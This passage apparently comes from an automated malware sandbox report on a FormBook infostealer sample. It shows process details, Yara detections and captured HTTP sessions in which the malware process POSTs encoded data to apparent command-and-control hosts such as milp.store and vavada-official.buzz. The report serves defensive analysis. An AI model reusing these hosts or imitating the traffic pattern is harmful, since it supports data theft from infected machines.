                                                Dec 13, 2024 11:41:16.337551117 CET1236INData Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09
                                                Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
                                                Dec 13, 2024 11:41:16.337682962 CET206INData Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70
                                                Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                                                Session ID:7
                                                Source IP:192.168.2.10
                                                Source Port:49964
                                                Destination IP:194.9.94.86
                                                Destination Port:80
                                                PID:2592
                                                Process:C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 13, 2024 11:41:17.729728937 CET | 1670 | OUT | POST /2j93/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: max-age=0
                                                Content-Length: 1230
                                                Connection: close
                                                Host: www.milp.store
                                                Origin: http://www.milp.store
                                                Referer: http://www.milp.store/2j93/
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                Data Raw: 36 68 7a 6c 70 3d 59 78 32 2f 30 66 79 67 66 46 46 65 6d 78 4a 74 51 59 43 2f 75 55 78 5a 52 57 31 35 62 34 67 79 65 51 79 39 2b 6a 51 53 50 6d 6b 6a 62 63 31 68 34 4d 54 77 69 4d 54 74 38 77 32 6f 6d 6f 71 65 6c 2f 6d 59 4f 64 52 49 4a 36 62 6b 6f 38 41 50 57 38 6d 74 2b 47 61 5a 74 75 79 52 65 6a 69 6d 4a 62 58 6c 32 38 54 35 67 4d 31 69 51 63 6c 32 37 68 31 55 77 32 71 66 31 56 33 43 2b 38 74 5a 4b 4e 7a 35 4b 44 65 37 30 6a 78 43 45 75 61 52 4f 41 53 46 33 68 36 31 4d 34 43 51 65 55 2b 4a 68 4f 65 31 31 55 34 4d 66 6c 4a 52 33 5a 55 70 70 56 76 4d 50 4b 46 69 71 75 38 74 7a 70 6a 4f 36 79 66 2f 45 6c 2f 6a 4c 54 4b 68 65 59 58 51 5a 48 68 34 55 77 5a 56 44 66 4b 53 6f 46 35 58 45 79 38 7a 4f 37 47 6c 6f 66 30 4b 41 46 43 71 67 55 69 53 66 79 61 34 52 48 41 77 56 58 57 59 39 46 67 32 2b 32 56 31 59 6c 6b 4c 4a 44 61 6b 37 2f 54 53 63 2f 69 67 55 50 49 51 76 4f 70 67 6b 6b 45 4d 6e 75 32 6c 32 39 36 47 75 6f 65 67 74 5a 61 63 4e 6b 41 32 7a 76 38 44 65 54 58 4b 55 6a 41 43 73 42 36 6a 62 66 48 63 [TRUNCATED]
                                                Data Ascii: 6hzlp=Yx2/0fygfFFemxJtQYC/uUxZRW15b4gyeQy9+jQSPmkjbc1h4MTwiMTt8w2omoqel/mYOdRIJ6bko8APW8mt+GaZtuyRejimJbXl28T5gM1iQcl27h1Uw2qf1V3C+8tZKNz5KDe70jxCEuaROASF3h61M4CQeU+JhOe11U4MflJR3ZUppVvMPKFiqu8tzpjO6yf/El/jLTKheYXQZHh4UwZVDfKSoF5XEy8zO7Glof0KAFCqgUiSfya4RHAwVXWY9Fg2+2V1YlkLJDak7/TSc/igUPIQvOpgkkEMnu2l296GuoegtZacNkA2zv8DeTXKUjACsB6jbfHckU2GzZdNlSpTRrHm9Sec7IeHTr88SBS6hFxOlGSjFz2JN49B/jt9doRBwNwQhO8JMW5BR1/Nc2jz67g7hPzlRsE/v94ZpC6iZ5CmMg7iYxMVxaEvJEEQXwy2YgG5ycLrvFiLBJKiyTY/puTqqzJ8I/7vV6uA3rfrEGBJxHgxhehGxI7SN1SmfVFG8vEJmiwgd7zX7y/k+nPG22CJdIBV2RIyae7IM3iqIL7oozz73hpM2z5+Xq96kKDm67a5Y9+vekL+kQB49ie4BcSD+rLHUUNXiVpdkMAlfZztV5Ad89BYt/x2YWlddmxoYtkjx10xL5oVnDNREkuT42S1Nc1sc4R5XUCpZeL60flaCb0OGR0R5qCVHbsLnYupCtUWEDrjuljJV9a/t/5vOjR0Zq4ovRjocdDlVnzXiJa6LvbTtS8W5Dplxz7gUBM4hXFfY19zlScZSMANvroEz/J+wr/lfTcbKRtCli+9rajYQqE8AjS7Ged5RH/U9jQ3LPcvhLpMUuFaF9uSbV9HuKGEe5fJfauU7ssCcnuOpIIh7iiuUFCqySSvitly6yJDKwRZhZHScQV4VcxRdO3gshQpnlSHe260hytOq2wYngZk9KCQKkSCIE198GAS+SO1xyZdKPu5Wa4eXY29dwGvVZ9yEWG6kZJD32RPwyNLXu [TRUNCATED]
                                                Dec 13, 2024 11:41:19.144171000 CET | 1236 | IN | HTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Fri, 13 Dec 2024 10:41:18 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Powered-By: PHP/8.1.29
                                                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                Dec 13, 2024 11:41:19.144351006 CET1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                Dec 13, 2024 11:41:19.144390106 CET448INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                Dec 13, 2024 11:41:19.144520044 CET1236INData Raw: 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 68 32 3e 0a 09 09 09 3c 70 3e 50 72 6f 74 65 63 74 20 79 6f 75 72 20
                                                Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
                                                Dec 13, 2024 11:41:19.144556046 CET1236INData Raw: 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e
                                                Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to get started with you
                                                Dec 13, 2024 11:41:19.144576073 CET430INData Raw: 77 77 2e 6c 6f 6f 70 69 61 2e 73 65 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67
                                                Data Ascii: ww.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https://www.loopia.com/support?


                                                Session ID:8
                                                Source IP:192.168.2.10
                                                Source Port:49970
                                                Destination IP:194.9.94.86
                                                Destination Port:80
                                                PID:2592
                                                Process:C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 13, 2024 11:41:20.388465881 CET | 380 | OUT | GET /2j93/?Hn=lLPdJfWx2zHd-riP&6hzlp=Vzef3oWXaGELtgUQK6WziDhXN2l6Tpk3Ax3n2w42PW1Tdv5T/46T0viVyj66+7X9h8HGTeoaGJDhn+MaRcWt633rnN+WFzamPt7emOGov712MsYpmA== HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Connection: close
                                                Host: www.milp.store
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                Dec 13, 2024 11:41:21.662540913 CET | 1236 | IN | HTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Fri, 13 Dec 2024 10:41:21 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Powered-By: PHP/8.1.29
                                                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                Dec 13, 2024 11:41:21.662626982 CET1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                Dec 13, 2024 11:41:21.662663937 CET448INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                Dec 13, 2024 11:41:21.662889004 CET1236INData Raw: 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 68 32 3e 0a 09 09 09 3c 70 3e 50 72 6f 74 65 63 74 20 79 6f 75 72 20
                                                Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
                                                Dec 13, 2024 11:41:21.662925005 CET1236INData Raw: 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e
                                                Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to get started with you
                                                Dec 13, 2024 11:41:21.662961006 CET430INData Raw: 77 77 2e 6c 6f 6f 70 69 61 2e 73 65 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67
                                                Data Ascii: ww.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https://www.loopia.com/support?


                                                Session ID:9
                                                Source IP:192.168.2.10
                                                Source Port:49980
                                                Destination IP:199.59.243.227
                                                Destination Port:80
                                                PID:2592
                                                Process:C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 13, 2024 11:41:27.393131971 CET | 663 | OUT | POST /emhd/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: max-age=0
                                                Content-Length: 194
                                                Connection: close
                                                Host: www.vavada-official.buzz
                                                Origin: http://www.vavada-official.buzz
                                                Referer: http://www.vavada-official.buzz/emhd/
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                Data Raw: 36 68 7a 6c 70 3d 56 31 59 4e 66 2f 73 62 43 37 53 47 74 63 61 76 31 48 5a 46 35 57 6f 2b 71 62 59 4e 58 7a 49 2b 6a 72 77 76 72 67 4d 2b 4c 4a 6b 53 2b 6a 61 56 71 78 68 63 6c 53 34 6e 7a 7a 75 45 61 75 49 45 41 62 50 4c 5a 46 6d 54 61 48 5a 33 6c 78 52 71 71 52 71 47 50 38 61 33 44 39 38 6e 57 54 53 39 6f 56 67 4d 48 70 42 72 32 2b 70 37 46 63 2b 74 59 6b 38 55 78 55 55 7a 51 6e 42 32 66 41 4b 63 63 68 43 37 75 77 61 73 32 6c 67 4c 54 31 78 2b 68 6a 62 77 51 57 4d 6c 39 38 47 32 4d 47 44 38 41 35 4f 4d 53 34 4b 79 6e 75 52 74 44 51 58 55 2f 31 75 69 34 4d 67 58 5a 79 70 48
                                                Data Ascii: 6hzlp=V1YNf/sbC7SGtcav1HZF5Wo+qbYNXzI+jrwvrgM+LJkS+jaVqxhclS4nzzuEauIEAbPLZFmTaHZ3lxRqqRqGP8a3D98nWTS9oVgMHpBr2+p7Fc+tYk8UxUUzQnB2fAKcchC7uwas2lgLT1x+hjbwQWMl98G2MGD8A5OMS4KynuRtDQXU/1ui4MgXZypH
                                                Dec 13, 2024 11:41:28.479172945 CET | 1236 | IN | HTTP/1.1 200 OK
                                                date: Fri, 13 Dec 2024 10:41:27 GMT
                                                content-type: text/html; charset=utf-8
                                                content-length: 1146
                                                x-request-id: 78db6671-640f-4d34-8acc-0e39b20cb5af
                                                cache-control: no-store, max-age=0
                                                accept-ch: sec-ch-prefers-color-scheme
                                                critical-ch: sec-ch-prefers-color-scheme
                                                vary: sec-ch-prefers-color-scheme
                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==
                                                set-cookie: parking_session=78db6671-640f-4d34-8acc-0e39b20cb5af; expires=Fri, 13 Dec 2024 10:56:28 GMT; path=/
                                                connection: close
                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 6c 47 55 39 6c 72 4c 66 54 43 43 4c 41 47 6f 42 61 75 45 6a 6a 79 76 4f 70 50 75 76 5a 51 4a 33 57 58 57 67 48 6b 37 31 72 4b 38 77 59 52 50 4c 7a 35 77 76 4f 54 61 56 54 2b 57 2b 46 59 62 4b 36 49 37 70 64 58 67 35 45 7a 6d 52 36 63 69 69 39 73 66 49 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                Dec 13, 2024 11:41:28.479288101 CET599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzhkYjY2NzEtNjQwZi00ZDM0LThhY2MtMGUzOWIyMGNiNWFmIiwicGFnZV90aW1lIjoxNzM0MDg2ND


                                                Target ID:5
                                                Start time:05:39:21
                                                Start date:13/12/2024
                                                Path:C:\Users\user\Desktop\new.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\new.exe"
                                                Imagebase:0xbc0000
                                                File size:1'208'832 bytes
                                                MD5 hash:8B86502F8B81E3335C1F4906C8ACB9F7
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:7
                                                Start time:05:39:24
                                                Start date:13/12/2024
                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\new.exe"
                                                Imagebase:0xbe0000
                                                File size:46'504 bytes
                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1897811815.0000000007850000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1893344480.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1894505430.0000000004BE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:05:40:13
                                                Start date:13/12/2024
                                                Path:C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe"
                                                Imagebase:0x750000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2533155385.0000000004350000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:10
                                                Start time:05:40:18
                                                Start date:13/12/2024
                                                Path:C:\Windows\SysWOW64\cttune.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\cttune.exe"
                                                Imagebase:0x640000
                                                File size:72'192 bytes
                                                MD5 hash:E515AF722F75E1A5708B532FAA483333
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2533835730.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2533575753.0000000003290000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2530076362.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:13
                                                Start time:05:40:30
                                                Start date:13/12/2024
                                                Path:C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                Wow64 process (32bit):true
